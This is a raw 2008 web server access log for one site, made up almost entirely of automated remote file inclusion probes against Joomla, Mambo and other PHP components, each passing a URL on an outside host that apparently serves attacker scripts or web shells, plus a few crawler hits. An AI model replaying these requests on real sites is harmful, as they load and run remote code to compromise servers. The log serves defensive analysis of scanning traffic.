82.78.216.197 - - [24/May/2008:09:19:11 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.geocities.com/mahesaputra53/kiss.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.78.216.197 - - [24/May/2008:09:19:12 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.geocities.com/mahesaputra53/kiss.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.47.201.117 - - [24/May/2008:09:19:13 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
72.47.201.117 - - [24/May/2008:09:19:13 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
213.234.216.10 - - [24/May/2008:09:20:00 -0700] "GET /logs/access_080124.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.234.216.10 - - [24/May/2008:09:20:01 -0700] "GET /logs/access_080124.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.146.133.138 - - [24/May/2008:09:20:14 -0700] "GET /logs/access_080218.log//modules/vwar/admin/admin.php?vwar_root=http://www.traderscorporation.com/fuckrox-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.21.71.133 - - [24/May/2008:09:20:45 -0700] "GET /logs/access.log//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.61.90 - - [24/May/2008:09:21:15 -0700] "GET /logs/access_080327.log/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.mode-gone.net/faq/faq.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.6.18.229 - - [24/May/2008:09:22:20 -0700] "GET /logs/access_070906.log HTTP/1.0" 200 32974 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.205.96.205 - - [24/May/2008:09:22:25 -0700] "GET /logs/access_080131.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.geocities.com/snozzer_boy/shell/31377os.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.96.205 - - [24/May/2008:09:22:26 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.geocities.com/snozzer_boy/shell/31377os.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.96.205 - - [24/May/2008:09:22:30 -0700] "GET /logs/access_080121.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.geocities.com/snozzer_boy/shell/31377os.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
84.21.71.133 - - [24/May/2008:09:22:41 -0700] "GET /logs/access_080126.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.78.216.197 - - [24/May/2008:09:22:45 -0700] "GET /config.php?path_to_root=http://www.geocities.com/koeluna/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
77.244.44.10 - - [24/May/2008:09:23:05 -0700] "GET /config.php?path_to_root=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
58.26.137.64 - - [24/May/2008:09:23:24 -0700] "GET /logs/index.php?ort=http://gsis.bogo.net/bbs/tes.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [24/May/2008:09:23:28 -0700] "GET /index.php?ort=http://gsis.bogo.net/bbs/tes.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.69" "www.dmulk.com"
212.113.24.150 - - [24/May/2008:09:23:46 -0700] "GET /logs/access_071224.log/modifyform.html?code=http://200.169.80.9/log/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.150 - - [24/May/2008:09:23:46 -0700] "GET /modifyform.html?code=http://200.169.80.9/log/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.150 - - [24/May/2008:09:23:47 -0700] "GET /logs/modifyform.html?code=http://200.169.80.9/log/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
72.47.201.117 - - [24/May/2008:09:23:49 -0700] "GET /config.php?path_to_root=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
207.44.134.122 - - [24/May/2008:09:23:53 -0700] "GET /logs/access.log/option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.freewebtown.com/cioabi/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
207.44.134.122 - - [24/May/2008:09:23:53 -0700] "GET /option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.freewebtown.com/cioabi/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
212.113.24.150 - - [24/May/2008:09:23:57 -0700] "GET /logs/access_071225.log/modifyform.html?code=http://200.169.80.9/log/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
209.163.169.99 - - [24/May/2008:09:24:25 -0700] "GET /logs//includes/messages.inc.php?include_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.163.169.99 - - [24/May/2008:09:24:25 -0700] "GET //includes/messages.inc.php?include_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.134.122 - - [24/May/2008:09:24:51 -0700] "GET /logs/access.log/option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.freewebtown.com/cioabi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.44.134.122 - - [24/May/2008:09:24:51 -0700] "GET /option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.freewebtown.com/cioabi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.44.134.122 - - [24/May/2008:09:24:51 -0700] "GET /logs/option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.freewebtown.com/cioabi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.44.134.122 - - [24/May/2008:09:24:56 -0700] "GET /option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.freewebtown.com/cioabi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
219.94.129.31 - - [24/May/2008:09:25:00 -0700] "GET /logs/access_080314.log//index.php?option=com_mamblog&Itemid=&mosConfig_absolute_path=http://injekz.fileave.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.86.123.123 - - [24/May/2008:09:25:07 -0700] "GET /logs/access.log/option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.freewebtown.com/cioabi/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
80.86.123.123 - - [24/May/2008:09:25:07 -0700] "GET /option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.freewebtown.com/cioabi/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
200.30.73.117 - - [24/May/2008:09:25:53 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/intestino/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.30.73.117 - - [24/May/2008:09:25:59 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/intestino/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.86.123.123 - - [24/May/2008:09:26:02 -0700] "GET /logs/access.log/option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.freewebtown.com/cioabi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.86.123.123 - - [24/May/2008:09:26:02 -0700] "GET /option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.freewebtown.com/cioabi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.86.123.123 - - [24/May/2008:09:26:03 -0700] "GET /logs/option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.freewebtown.com/cioabi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.234.216.10 - - [24/May/2008:09:26:43 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.234.216.10 - - [24/May/2008:09:26:43 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.234.216.10 - - [24/May/2008:09:26:43 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.234.216.10 - - [24/May/2008:09:26:44 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.82.99.126 - - [24/May/2008:09:26:57 -0700] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://www.hssilva.net/ess//claroline/tracking/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.234.216.10 - - [24/May/2008:09:26:57 -0700] "GET /logs/access_080127.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.86.123.123 - - [24/May/2008:09:27:02 -0700] "GET /option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.freewebtown.com/cioabi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.234.216.10 - - [24/May/2008:09:27:02 -0700] "GET /logs/access_080127.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.49.254.102 - - [24/May/2008:09:27:42 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://xotaz.t35.com/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
64.49.254.102 - - [24/May/2008:09:27:42 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://xotaz.t35.com/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
193.54.123.192 - - [24/May/2008:09:27:49 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.indicce.com/admin/r57? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.82.99.126 - - [24/May/2008:09:27:59 -0700] "GET /logs/access_080201.log//modules/xfsection/modify.php?dir_module=http://www.hssilva.net/ess//claroline/tracking/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
193.54.123.192 - - [24/May/2008:09:28:04 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.indicce.com/admin/r57? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.63.130.242 - - [24/May/2008:09:28:19 -0700] "GET //redaxo/include/addons/image_resize/pages/index.inc.php?subpage=relations&REX[INCLUDE_PATH]=http://www.insertcoinhere.de//language/lang_english/.../contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
212.63.130.242 - - [24/May/2008:09:28:20 -0700] "GET /logs//redaxo/include/addons/image_resize/pages/index.inc.php?subpage=relations&REX[INCLUDE_PATH]=http://www.insertcoinhere.de//language/lang_english/.../contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
200.249.155.6 - - [24/May/2008:09:28:23 -0700] "GET /logs/access.log//login.php?dir=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.249.155.6 - - [24/May/2008:09:28:42 -0700] "GET /logs/access_080215.log//login.php?dir=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.54.123.192 - - [24/May/2008:09:29:05 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.indicce.com/admin/r57? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.164.178.178 - - [24/May/2008:09:30:50 -0700] "GET /logs/config.php?path_to_root=http://www.paholyonline.hu/forum/images/sup.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.164.178.178 - - [24/May/2008:09:30:50 -0700] "GET /config.php?path_to_root=http://www.paholyonline.hu/forum/images/sup.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.111.173.45 - - [24/May/2008:09:30:52 -0700] "GET /logs/access_080125.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.45 - - [24/May/2008:09:30:52 -0700] "GET /logs/access_080121.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.45 - - [24/May/2008:09:31:01 -0700] "GET /logs/access_080125.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://amsny.org/site/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.45 - - [24/May/2008:09:31:01 -0700] "GET /logs/access_080121.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://amsny.org/site/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.113.24.150 - - [24/May/2008:09:31:13 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://200.169.80.9/log/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.150 - - [24/May/2008:09:31:13 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://200.169.80.9/log/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
67.205.96.205 - - [24/May/2008:09:31:56 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/snozzer_boy/shell/31377os.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.96.205 - - [24/May/2008:09:31:56 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/snozzer_boy/shell/31377os.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.61.90 - - [24/May/2008:09:32:21 -0700] "GET /logs/access_080322.log//index.php?cat=http://www.mode-gone.net/faq/faq.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [24/May/2008:09:32:25 -0700] "GET //index.php?cat=http://www.mode-gone.net/faq/faq.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [24/May/2008:09:32:25 -0700] "GET /logs//index.php?cat=http://www.mode-gone.net/faq/faq.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.205.96.205 - - [24/May/2008:09:32:50 -0700] "GET /logs/access_071215.log//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/snozzer_boy/shell/31377os.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.146.59.231 - - [24/May/2008:09:32:56 -0700] "GET /logs/access_071219.log//includes/messages.inc.php?include_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.113.24.150 - - [24/May/2008:09:33:34 -0700] "GET /logs/access_080220.log/joomla/index.php?option=com_restaurante&task=http://200.169.80.9/log/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.150 - - [24/May/2008:09:33:34 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://200.169.80.9/log/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.150 - - [24/May/2008:09:33:35 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://200.169.80.9/log/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
217.194.33.88 - - [24/May/2008:09:33:37 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/ulandary/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
217.194.33.88 - - [24/May/2008:09:33:37 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/ulandary/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
74.6.18.229 - - [24/May/2008:09:33:43 -0700] "GET /bikes/dteel/?N=D HTTP/1.0" 200 9501 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
212.113.24.150 - - [24/May/2008:09:33:47 -0700] "GET /logs/access_080223.log/joomla/index.php?option=com_restaurante&task=http://200.169.80.9/log/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
83.244.130.90 - - [24/May/2008:09:34:03 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/ulandary/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
83.244.130.90 - - [24/May/2008:09:34:04 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/ulandary/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
217.197.68.66 - - [24/May/2008:09:34:06 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://tutorials.fyreblade.com/cx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.12.151.34 - - [24/May/2008:09:34:08 -0700] "GET /logs//_theme/breadcrumb.php?rootBase=http://copapetrobrasdetenis.com.br/admin/internas_upload/.ownz/safeon.gif??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
201.12.151.34 - - [24/May/2008:09:34:16 -0700] "GET //_theme/breadcrumb.php?rootBase=http://copapetrobrasdetenis.com.br/admin/internas_upload/.ownz/safeon.gif??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
77.244.44.10 - - [24/May/2008:09:34:57 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.geocities.com/mahesaputra53/kiss.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
77.244.44.10 - - [24/May/2008:09:34:57 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.geocities.com/mahesaputra53/kiss.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
208.80.193.43 - - [24/May/2008:09:35:21 -0700] "GET / HTTP/1.1" 200 11606 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc2; i686 Linux; 20020120)" "www.dmulk.com"
64.22.119.2 - - [24/May/2008:09:35:34 -0700] "GET /logs/config.php?path_to_root=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.22.119.2 - - [24/May/2008:09:35:34 -0700] "GET /config.php?path_to_root=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.113.24.150 - - [24/May/2008:09:36:23 -0700] "GET /logs/access_080220.log/joomla/index.php?option=com_restaurante&task=http://200.169.80.9/log/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.150 - - [24/May/2008:09:36:31 -0700] "GET /logs/access_080223.log/joomla/index.php?option=com_restaurante&task=http://200.169.80.9/log/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
82.77.9.141 - - [24/May/2008:09:37:44 -0700] "GET /option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.freewebtown.com/cioabi/coi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
82.77.9.141 - - [24/May/2008:09:37:45 -0700] "GET /option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.freewebtown.com/cioabi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
82.77.9.141 - - [24/May/2008:09:37:45 -0700] "GET /logs/option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.freewebtown.com/cioabi/coi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
82.77.9.141 - - [24/May/2008:09:37:46 -0700] "GET /logs/option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.freewebtown.com/cioabi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
158.227.2.24 - - [24/May/2008:09:38:02 -0700] "GET //index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://www.alazharacademy.ca//id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.65" "www.dmulk.com"
217.197.68.66 - - [24/May/2008:09:38:56 -0700] "GET /logs/access.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://tutorials.fyreblade.com/cx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.197.68.66 - - [24/May/2008:09:38:57 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://tutorials.fyreblade.com/cx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.197.68.66 - - [24/May/2008:09:38:57 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://tutorials.fyreblade.com/cx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
